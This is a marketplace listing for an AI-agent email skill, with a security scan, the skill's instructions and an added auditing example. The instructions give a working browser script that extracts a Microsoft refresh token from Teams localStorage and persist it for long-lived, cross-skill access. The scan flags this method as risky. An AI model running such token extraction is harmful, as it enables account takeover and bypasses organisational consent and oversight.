Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using.

Outlook Hack

Your agent reads Outlook email all day. Drafts replies for you. Won't send a single one. Not even if you ask nicely.

MIT-0 · Free to use, modify, and redistribute. No attribution required.
by Oscar Serra @globalcaos
Security Scan
VirusTotal: Suspicious
OpenClaw: Suspicious (medium confidence)
Purpose & Capability
The code and instructions align with the stated purpose: reading, searching, indexing attachments, generating summaries, creating drafts and accessing calendar/contacts via Microsoft Graph. However, the chosen method for authentication (extracting an MSAL refresh token from Teams localStorage and reusing it across skills) is unusual and elevates risk even though it is coherent with the goal of using Graph APIs without formal OAuth consent flows.
Instruction Scope
SKILL.md explicitly instructs you to run browser JS in the Teams tab to read localStorage and extract an MSAL refresh token, and to use a separate 'teams' CLI to store it. The runtime instructions therefore direct the agent/user to access browser session storage and persist a powerful credential locally. The instructions also recommend cron jobs to keep the refresh token alive. These steps are beyond ordinary usage instructions and expose sensitive session tokens; they expand scope to browser session access and persistent credential management.
Install Mechanism
There is no network-based install step and no external downloads; code is bundled with the skill and runs as pure Node.js scripts (v18+). That reduces supply-chain risk. The skill is 'instruction-only' in terms of install spec, but it does include local scripts that will be written to disk when installed/run.
Credentials
No environment variables are requested, which is consistent, but the skill depends on a refresh token extracted from browser localStorage. That refresh token grants broad Graph access and is long‑lived (the SKILL.md claims ~90 days and auto-rotates), and the skill shares the same token file with another skill ('teams-hack'). Tokens are stored under ~/.openclaw/credentials/outlook-msal.json (0600), which is better than world-readable but still a single point of sensitive credential persistence and cross-skill privilege escalation. The need for a refresh token is understandable for Graph access, but the extraction method and cross-skill reuse are disproportionate and increase blast radius.
Persistence & Privilege
The skill does not set always:true and does not request elevated system privileges. However it persists a powerful credential to disk and the documentation recommends running periodic jobs that keep the refresh token alive — this encourages persistent, autonomous access. Also the token file is shared with other skills, which increases the long-term privilege this skill (and others) can exercise.
What to consider before installing
Before installing: understand that this skill asks you to extract an MSAL refresh token from your Teams browser session (via a browser snippet) and stores that token on disk for up to 90 days. That token can be used to read pretty much everything in the account (mail, attachments, calendar, contacts) and is shared with other skills. If you proceed, consider: (1) only run this on a low-risk/test account, not a high-value corporate account; (2) inspect the bundled scripts yourself (they are included) to confirm send operations are actually blocked and no other exfil endpoints exist; (3) prefer an OAuth app with proper consent rather than extracting localStorage tokens where possible; (4) restrict filesystem permissions and remove the token file when finished (delete ~/.openclaw/credentials/outlook-msal.json); (5) rotate/revoke the refresh token in your Microsoft account if you stop using the skill; (6) avoid giving the browser relay access to privileged sessions unless you trust the environment. If you are not comfortable with extracting and storing refresh tokens, do not install.

Like a lobster shell, security has layers — review code before you run it.

Current version: v1.0.1

Runtime requirements

📧 Clawdis
OS: Linux · macOS

SKILL.md

Outlook Hack

Your AI agent won't email the CEO at 3am.

Not because there's a setting. Not because there's a policy. Because the code physically cannot send emails. We removed that capability the way you'd remove a chainsaw from a toddler — completely and without negotiation.

What It Does

  • 📧 Read, search, and bulk-fetch emails across all folders
  • 📎 Index all attachments (name, type, size) per message
  • 📊 Generate digest summaries with top senders, unread counts, full body text
  • ✏️ Create email drafts (lands in Drafts folder — never sends)
  • 📅 Access calendar events, 👥 Browse contacts

Quick Start

1. Token Extraction (one-time, ~30 seconds)

Extract from the Teams tab, NOT Outlook. Classic Outlook no longer exists in most orgs, and new Outlook uses PoP tokens that can't be extracted. The Teams tab provides an MSAL refresh token (90-day, auto-rotating) that powers both this skill and the teams-hack skill.

Open Microsoft Teams (teams.cloud.microsoft) in Chrome with the OpenClaw browser relay attached. Then run this in-browser evaluation:

(() => {
  const keys = Object.keys(localStorage).filter(
    (k) => k.includes("refreshtoken") || k.includes("RefreshToken"),
  );
  const parsed = JSON.parse(localStorage.getItem(keys[0]));
  const accountKeys = Object.keys(localStorage).filter((k) => {
    try {
      return JSON.parse(localStorage.getItem(k)).tenantId;
    } catch {
      return false;
    }
  });
  let tenantId = null;
  for (const k of accountKeys) {
    try {
      tenantId = JSON.parse(localStorage.getItem(k)).tenantId;
      break;
    } catch {}
  }
  return { secret: parsed.secret, tenantId };
})();

Save the token via the teams CLI (NOT the outlook-mail-fetch script):

teams token store --refresh-token "<secret>" --tenant-id "<tenantId>"

2. Verify Access

node {baseDir}/scripts/outlook-mail-fetch.mjs --test

3. Bulk Fetch

# Last 6 months (default)
node {baseDir}/scripts/outlook-mail-fetch.mjs --fetch-all

# Custom range
node {baseDir}/scripts/outlook-mail-fetch.mjs --fetch-all --months 12

Output: ~/.openclaw/workspace/data/outlook-emails/

  • raw-emails.jsonl — full email data (subject, from, to, body text, preview)
  • attachments-index.jsonl — every attachment per message
  • email-summary.md — readable digest with stats and per-email summaries

Critical: Teams is the Token Source

| Source | Token Type | Extractable? | Lifetime |
| --- | --- | --- | --- |
| Teams (teams.cloud.microsoft) | MSAL refresh token | ✅ Yes | 90 days, auto-rotates |
| New Outlook (outlook.cloud.microsoft) | PoP token (Proof-of-Possession) | ❌ No | Crypto-bound to browser |
| Classic Outlook (outlook.office.com) | Bearer access token | ⚠️ Deprecated/gone | Most orgs migrated |

Always extract from the Teams tab. New Outlook uses Proof-of-Possession tokens that cannot be extracted or replayed. Classic Outlook is deprecated and no longer available in most orgs.

How It Works (Technical)

  1. Share your Microsoft Teams tab with OpenClaw via the Browser Relay
  2. The agent reads localStorage to extract the MSAL refresh token
  3. Token is stored and exchanged for a Graph API access token via teams token store
  4. Both this skill and teams-hack share ~/.openclaw/credentials/outlook-msal.json (0600)
  5. The outlook-mail-fetch.mjs script uses the Graph API access token for mail operations
  6. Refresh token lasts 90 days and auto-rotates on each use

The skill is NOT scraping the page. It speaks Outlook's own REST API, authenticated through your existing browser session.

Token Lifetime & Refresh

  • Refresh token: 90 days, auto-rotates on each use (shared with teams-hack)
  • Access token: ~1 hour, automatically refreshed by the scripts
  • Any cron job using either skill keeps the refresh token alive
  • When expired: re-extract from Teams tab (one browser relay session)

Architecture Notes

  • Zero external dependencies — pure Node.js (v18+), no npm packages
  • Send-blocked — the script has no send/reply/forward functions. They don't exist.
  • Rate-limited — fetches 50 emails per page with automatic pagination
  • Body text cleaned — HTML stripped, whitespace normalized, truncated to 3000 chars per email
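
One way to test the "send-blocked" claim before trusting it, as an added example (not the skill's own code): a static pass over a script's source that flags Microsoft Graph send, reply and forward paths and any URL host outside an allow-list. The pattern list, the allow-list and the sample sources are assumptions constructed for illustration.

```javascript
// Added example: static first-pass audit of a skill script. The send-path
// patterns and host allow-list below are reviewer assumptions, not the skill's.
const SEND_PATTERNS = [
  { name: "sendMail", re: /\/sendMail\b/i },
  { name: "message send", re: /\/messages\/[^\s"'`]*\/send\b/i },
  { name: "reply", re: /\/(reply|replyAll)\b/i },
  { name: "forward", re: /\/forward\b/i },
];
const ALLOWED_HOSTS = new Set(["graph.microsoft.com", "login.microsoftonline.com"]);

// Returns findings as { line, kind, detail } objects (line numbers are 1-based).
function auditSource(source) {
  const findings = [];
  source.split("\n").forEach((text, i) => {
    for (const { name, re } of SEND_PATTERNS) {
      if (re.test(text)) findings.push({ line: i + 1, kind: "send-path", detail: name });
    }
    // Capture the whole URL authority, then drop userinfo and port so that
    // "https://graph.microsoft.com@other.host/" is judged by its real host.
    for (const m of text.matchAll(/https?:\/\/([^\s"'`\/?#]+)/gi)) {
      const host = m[1].split("@").pop().split(":")[0].toLowerCase();
      if (!ALLOWED_HOSTS.has(host)) {
        findings.push({ line: i + 1, kind: "unexpected-host", detail: host });
      }
    }
  });
  return findings;
}

// Constructed sample sources (not taken from the skill's files).
const SAMPLE_CLEAN = [
  'const GRAPH = "https://graph.microsoft.com/v1.0";',
  "await call(`${GRAPH}/me/messages?$top=50`);",
  "await call(`${GRAPH}/me/messages`, { method: 'POST', body: draft });",
].join("\n");
const SAMPLE_BAD = [
  "await call(`${GRAPH}/me/messages/${id}/send`, { method: 'POST' });",
  'await fetch("https://collector.example.net/upload", { method: "POST", body });',
].join("\n");

console.log(auditSource(SAMPLE_CLEAN));
console.log(auditSource(SAMPLE_BAD));
```

A string scan only catches literal paths and hosts; endpoints assembled at runtime need review by hand or an egress allow-list on the machine running the skill.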

The Full Stack

Pair with whatsapp-ultimate for messaging and jarvis-voice for voice.

👉 Clone it. Fork it. Break it. Make it yours.
